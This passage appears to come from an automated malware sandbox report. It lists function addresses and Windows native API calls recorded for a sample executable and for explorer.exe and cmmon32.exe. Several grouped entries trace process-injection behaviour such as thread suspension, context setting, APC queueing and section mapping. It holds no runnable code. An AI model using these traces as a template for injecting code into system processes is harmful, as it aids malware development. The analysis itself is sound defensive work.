                Source: C:\Windows\explorer.exeCode function: 12_2_0869FE12 NtProtectVirtualMemory,12_2_0869FE12
                Source: C:\Windows\explorer.exeCode function: 12_2_0869FE0A NtProtectVirtualMemory,12_2_0869FE0A
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32CA0 NtQueryInformationToken,LdrInitializeThunk,14_2_04C32CA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32C60 NtCreateKey,LdrInitializeThunk,14_2_04C32C60
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32C70 NtFreeVirtualMemory,LdrInitializeThunk,14_2_04C32C70
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32DD0 NtDelayExecution,LdrInitializeThunk,14_2_04C32DD0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32DF0 NtQuerySystemInformation,LdrInitializeThunk,14_2_04C32DF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32D10 NtMapViewOfSection,LdrInitializeThunk,14_2_04C32D10
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_04C32EA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32FE0 NtCreateFile,LdrInitializeThunk,14_2_04C32FE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32F30 NtCreateSection,LdrInitializeThunk,14_2_04C32F30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32AD0 NtReadFile,LdrInitializeThunk,14_2_04C32AD0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32BE0 NtQueryValueKey,LdrInitializeThunk,14_2_04C32BE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32BF0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_04C32BF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32B60 NtClose,LdrInitializeThunk,14_2_04C32B60
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C335C0 NtCreateMutant,LdrInitializeThunk,14_2_04C335C0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C34650 NtSuspendThread,14_2_04C34650
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C34340 NtSetContextThread,14_2_04C34340
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32CC0 NtQueryVirtualMemory,14_2_04C32CC0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32CF0 NtOpenProcess,14_2_04C32CF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32C00 NtQueryInformationProcess,14_2_04C32C00
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32DB0 NtEnumerateKey,14_2_04C32DB0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32D00 NtSetInformationFile,14_2_04C32D00
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32D30 NtUnmapViewOfSection,14_2_04C32D30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32EE0 NtQueueApcThread,14_2_04C32EE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32E80 NtReadVirtualMemory,14_2_04C32E80
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32E30 NtWriteVirtualMemory,14_2_04C32E30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32F90 NtProtectVirtualMemory,14_2_04C32F90
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32FA0 NtQuerySection,14_2_04C32FA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32FB0 NtResumeThread,14_2_04C32FB0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32F60 NtCreateProcessEx,14_2_04C32F60
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32AF0 NtWriteFile,14_2_04C32AF0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32AB0 NtWaitForSingleObject,14_2_04C32AB0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32B80 NtQueryInformationFile,14_2_04C32B80
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C32BA0 NtEnumerateValueKey,14_2_04C32BA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C33090 NtSetValueKey,14_2_04C33090
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C33010 NtOpenDirectoryObject,14_2_04C33010
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C33D70 NtOpenThread,14_2_04C33D70
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C33D10 NtOpenProcessToken,14_2_04C33D10
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C339B0 NtGetContextThread,14_2_04C339B0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA350 NtCreateFile,14_2_02CAA350
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA480 NtClose,14_2_02CAA480
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA400 NtReadFile,14_2_02CAA400
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA530 NtAllocateVirtualMemory,14_2_02CAA530
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA2C2 NtCreateFile,14_2_02CAA2C2
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA3FA NtReadFile,14_2_02CAA3FA
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_02CAA47C NtClose,14_2_02CAA47C
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04ADA036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,RtlQueueApcWow64Thread,NtResumeThread,14_2_04ADA036
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD9BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,14_2_04AD9BAF
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04ADA042 NtQueryInformationProcess,14_2_04ADA042
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04AD9BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_04AD9BB2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_018FDA743_2_018FDA74
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064E06903_2_064E0690
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_064E06803_2_064E0680
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C93B583_2_07C93B58
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C934E13_2_07C934E1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C934F03_2_07C934F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C9BB583_2_07C9BB58
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07C9BB573_2_07C9BB57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF9A883_2_07CF9A88
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF5D703_2_07CF5D70
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF3CC03_2_07CF3CC0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF3CB03_2_07CF3CB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF34333_2_07CF3433
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF53683_2_07CF5368
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 3_2_07CF38883_2_07CF3888
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041E80A11_2_0041E80A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0040103011_2_00401030
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D83F11_2_0041D83F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041DAA811_2_0041DAA8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00402D8911_2_00402D89
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00402D9011_2_00402D90
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0041D59311_2_0041D593
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00409E5011_2_00409E50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00402FB011_2_00402FB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102010011_2_01020100
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CA11811_2_010CA118
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B815811_2_010B8158
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F01AA11_2_010F01AA
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E41A211_2_010E41A2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E81CC11_2_010E81CC
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C200011_2_010C2000
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EA35211_2_010EA352
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F03E611_2_010F03E6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103E3F011_2_0103E3F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D027411_2_010D0274
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B02C011_2_010B02C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103053511_2_01030535
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F059111_2_010F0591
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D442011_2_010D4420
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E244611_2_010E2446
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DE4F611_2_010DE4F6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105475011_2_01054750
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103077011_2_01030770
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102C7C011_2_0102C7C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104C6E011_2_0104C6E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104696211_2_01046962
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A011_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010FA9A611_2_010FA9A6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103A84011_2_0103A840
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103284011_2_01032840
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010168B811_2_010168B8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105E8F011_2_0105E8F0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EAB4011_2_010EAB40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E6BD711_2_010E6BD7
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA8011_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103AD0011_2_0103AD00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CCD1F11_2_010CCD1F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01048DBF11_2_01048DBF
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102ADE011_2_0102ADE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030C0011_2_01030C00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D0CB511_2_010D0CB5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020CF211_2_01020CF2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01072F2811_2_01072F28
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01050F3011_2_01050F30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D2F3011_2_010D2F30
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A4F4011_2_010A4F40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AEFA011_2_010AEFA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01022FC811_2_01022FC8
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103CFE011_2_0103CFE0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EEE2611_2_010EEE26
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030E5911_2_01030E59
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042E9011_2_01042E90
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010ECE9311_2_010ECE93
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EEEDB11_2_010EEEDB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010FB16B11_2_010FB16B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106516C11_2_0106516C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101F17211_2_0101F172
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103B1B011_2_0103B1B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DF0CC11_2_010DF0CC
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010370C011_2_010370C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E70E911_2_010E70E9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EF0E011_2_010EF0E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E132D11_2_010E132D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101D34C11_2_0101D34C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0107739A11_2_0107739A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010352A011_2_010352A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104B2C011_2_0104B2C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D12ED11_2_010D12ED
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E757111_2_010E7571
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CD5B011_2_010CD5B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F95C311_2_010F95C3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EF43F11_2_010EF43F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102146011_2_01021460
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EF7B011_2_010EF7B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0107563011_2_01075630
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E16CC11_2_010E16CC
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C591011_2_010C5910
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0103995011_2_01039950
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104B95011_2_0104B950
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109D80011_2_0109D800
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010338E011_2_010338E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EFB7611_2_010EFB76
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104FB8011_2_0104FB80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A5BF011_2_010A5BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0106DBF911_2_0106DBF9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EFA4911_2_010EFA49
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E7A4611_2_010E7A46
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A3A6C11_2_010A3A6C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CDAAC11_2_010CDAAC
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01075AA011_2_01075AA0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D1AA311_2_010D1AA3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010DDAC611_2_010DDAC6
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01033D4011_2_01033D40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E1D5A11_2_010E1D5A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E7D7311_2_010E7D73
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104FDC011_2_0104FDC0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A9C3211_2_010A9C32
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EFCF211_2_010EFCF2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EFF0911_2_010EFF09
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01031F9211_2_01031F92
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EFFB111_2_010EFFB1
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF3FD511_2_00FF3FD5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_00FF3FD211_2_00FF3FD2
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01039EB011_2_01039EB0
                Source: C:\Windows\explorer.exeCode function: 12_2_0869E23212_2_0869E232
                Source: C:\Windows\explorer.exeCode function: 12_2_0869D03612_2_0869D036
                Source: C:\Windows\explorer.exeCode function: 12_2_0869408212_2_08694082
                Source: C:\Windows\explorer.exeCode function: 12_2_08698B3012_2_08698B30
                Source: C:\Windows\explorer.exeCode function: 12_2_08698B3212_2_08698B32
                Source: C:\Windows\explorer.exeCode function: 12_2_08695D0212_2_08695D02
                Source: C:\Windows\explorer.exeCode function: 12_2_0869B91212_2_0869B912
                Source: C:\Windows\explorer.exeCode function: 12_2_086A15CD12_2_086A15CD
                Source: C:\Windows\explorer.exeCode function: 12_2_0E82623212_2_0E826232
                Source: C:\Windows\explorer.exeCode function: 12_2_0E820B3212_2_0E820B32
                Source: C:\Windows\explorer.exeCode function: 12_2_0E820B3012_2_0E820B30
                Source: C:\Windows\explorer.exeCode function: 12_2_0E81C08212_2_0E81C082
                Source: C:\Windows\explorer.exeCode function: 12_2_0E82503612_2_0E825036
                Source: C:\Windows\explorer.exeCode function: 12_2_0E8295CD12_2_0E8295CD
                Source: C:\Windows\explorer.exeCode function: 12_2_0E81DD0212_2_0E81DD02
                Source: C:\Windows\explorer.exeCode function: 12_2_0E82391212_2_0E823912
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CAE4F614_2_04CAE4F6
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB244614_2_04CB2446
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CA442014_2_04CA4420
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CC059114_2_04CC0591
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0053514_2_04C00535
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C1C6E014_2_04C1C6E0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BFC7C014_2_04BFC7C0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C2475014_2_04C24750
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0077014_2_04C00770
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C9200014_2_04C92000
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB81CC14_2_04CB81CC
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CC01AA14_2_04CC01AA
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB41A214_2_04CB41A2
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C8815814_2_04C88158
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BF010014_2_04BF0100
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C9A11814_2_04C9A118
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C802C014_2_04C802C0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CA027414_2_04CA0274
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CC03E614_2_04CC03E6
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0E3F014_2_04C0E3F0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBA35214_2_04CBA352
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BF0CF214_2_04BF0CF2
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CA0CB514_2_04CA0CB5
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C00C0014_2_04C00C00
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BFADE014_2_04BFADE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C18DBF14_2_04C18DBF
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0AD0014_2_04C0AD00
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C9CD1F14_2_04C9CD1F
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBEEDB14_2_04CBEEDB
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C12E9014_2_04C12E90
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBCE9314_2_04CBCE93
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C00E5914_2_04C00E59
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBEE2614_2_04CBEE26
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0CFE014_2_04C0CFE0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C7EFA014_2_04C7EFA0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BF2FC814_2_04BF2FC8
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C74F4014_2_04C74F40
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C42F2814_2_04C42F28
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C20F3014_2_04C20F30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CA2F3014_2_04CA2F30
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BE68B814_2_04BE68B8
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C2E8F014_2_04C2E8F0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0A84014_2_04C0A840
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0284014_2_04C02840
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C029A014_2_04C029A0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CCA9A614_2_04CCA9A6
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C1696214_2_04C16962
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BFEA8014_2_04BFEA80
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB6BD714_2_04CB6BD7
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBAB4014_2_04CBAB40
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BF146014_2_04BF1460
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBF43F14_2_04CBF43F
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CC95C314_2_04CC95C3
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C9D5B014_2_04C9D5B0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB757114_2_04CB7571
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB16CC14_2_04CB16CC
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C4563014_2_04C45630
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBF7B014_2_04CBF7B0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C070C014_2_04C070C0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CAF0CC14_2_04CAF0CC
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CB70E914_2_04CB70E9
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CBF0E014_2_04CBF0E0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C0B1B014_2_04C0B1B0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CCB16B14_2_04CCB16B
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C3516C14_2_04C3516C
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04BEF17214_2_04BEF172
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C1B2C014_2_04C1B2C0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04CA12ED14_2_04CA12ED
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C052A014_2_04C052A0
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_04C4739A14_2_04C4739A
